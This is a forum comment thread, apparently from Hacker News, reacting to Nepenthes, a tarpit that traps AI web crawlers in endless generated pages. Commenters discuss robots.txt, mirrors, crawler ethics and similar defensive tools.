                                                                                                                                        Is there a reason people can't use hashcash or some other proof of work system on these bad citizen crawlers?

                                                                                                                                        • upwardbound2 13 days ago

                                                                                                                                          Is Nepenthes being mirrored in enough places to keep the community going if the original author gets any DMCA trouble or anything? I'd be happy to host a mirror but am pretty busy and I don't want to miss a critical file by accident.

                                                                                                                                          • DigiEggz 13 days ago

                                                                                                                                            Amazing project. I hope to see this put to serious use.

                                                                                                                                            As a quick note and not sure if it's already been mentioned, but the main blurb has a typo: "... go back into a the tarpit"

                                                                                                                                            • davidw 13 days ago

                                                                                                                                              Is the source code hosted somewhere in something like GitHub?

                                                                                                                                              • monkaiju 13 days ago

                                                                                                                                                Fantastic! Hopefully this not only leads to model collapse but also damages the search engines who have broken the contract they had with site makers.

                                                                                                                                                • ggm 13 days ago

                                                                                                                                                  Wouldn't it be better to perform random early drop in the path. Surely better slowdown than forced time delays in your own server?

                                                                                                                                                  • yapyap 12 days ago

                                                                                                                                                      Very nice. I remember seeing a writeup by someone who had basically done the same thing as a coding test or something of the like (before LLM crawlers) and was catching / getting harassed by LLMs ignoring the robots.txt to scrape his website. By accident of course, since he had made his website before the times of LLM scraping.

                                                                                                                                                    • phito 13 days ago

                                                                                                                                                      As a carnivorous plant enthusiast, I love the name.

                                                                                                                                                      • grahamj 13 days ago

                                                                                                                                                        That’s so funny, I’ve thought of this exact idea several times over the last couple of weeks. As usual someone beat me to it :D

                                                                                                                                                        • sedatk 13 days ago

                                                                                                                                                          Both ChatGPT 4o and Claude 3.5 Sonnet can identify the generated page content as "random words".

                                                                                                                                                          • ycombinatrix 13 days ago

                                                                                                                                                            So this is basically endlessh for HTTP? Why not feed AI web crawlers with nonsense information instead?

                                                                                                                                                            • Mr_Bees69 12 days ago

                                                                                                                                                                Please add a robots.txt; it's quite a d### move to people who build responsible crawlers for fun.

                                                                                                                                                              • Dig1t 12 days ago

                                                                                                                                                                Could a human detect that this site is a tarpit?

                                                                                                                                                                If so, then an AI crawler almost certainly can as well.

                                                                                                                                                                • arend321 12 days ago

                                                                                                                                                                    I'm actually quite happy with AI crawlers. I recently found out ChatGPT suggests one of my sites when asked to suggest a good, independent site that covered the topic I searched for. Especially now that, for instance, ChatGPT is adding source links, I think we should treat AI crawlers the same as search engine crawlers.

                                                                                                                                                                  • klez 13 days ago

                                                                                                                                                                    Not to be confused with the apparently now defunct Nepenthes malware honeypot.

                                                                                                                                                                    I used to use it when I collected malware.

                                                                                                                                                                    Archived site: https://web.archive.org/web/20090122063005/http://nepenthes....

                                                                                                                                                                    Github mirror: https://github.com/honeypotarchive/nepenthes

                                                                                                                                                                    • anocendi 13 days ago

                                                                                                                                                                      Similar concept to SpiderTrap tool infosec folks use for active defense.

                                                                                                                                                                      • sharpshadow 12 days ago

                                                                                                                                                                        Would various decompression bombs work to increase the load?

                                                                                                                                                                        • bloomingkales 12 days ago

                                                                                                                                                                          Wouldn’t an LLM be smart enough to spot a tarpit?

                                                                                                                                                                          • undefined 13 days ago
                                                                                                                                                                            [deleted]
                                                                                                                                                                            • ddmma 13 days ago

                                                                                                                                                                              Server extension package

                                                                                                                                                                              • guluarte 13 days ago

                                                                                                                                                                                markov chains?

                                                                                                                                                                                • at_a_remove 13 days ago

                                                                                                                                                                                  I have a very vague concept for this, with a different implementation.

                                                                                                                                                                                  Some, uh, sites (forums?) have content that the AI crawlers would like to consume, and, from what I have heard, the crawlers can irresponsibly hammer the traffic of said sites into oblivion.

                                                                                                                                                                                  What if, for the sites which are paywalled, the signup, which invariably comes with a long click-through EULA, had a legal trap within it, forbidding ingestion by AI models on pain of, say, owning ten percent of the company should this be violated. Make sure there is some kind of token payment to get to the content.

                                                                                                                                                                                  Then seed the site with a few instances of hapax legomenon. Trace the crawler back and get the resulting model to vomit back the originating info, as proof.

                                                                                                                                                                                  This should result in either crawlers being more respectful or the end of the hated click-through EULA. We win either way.

                                                                                                                                                                                  • observationist 13 days ago

                                                                                                                                                                                    [flagged]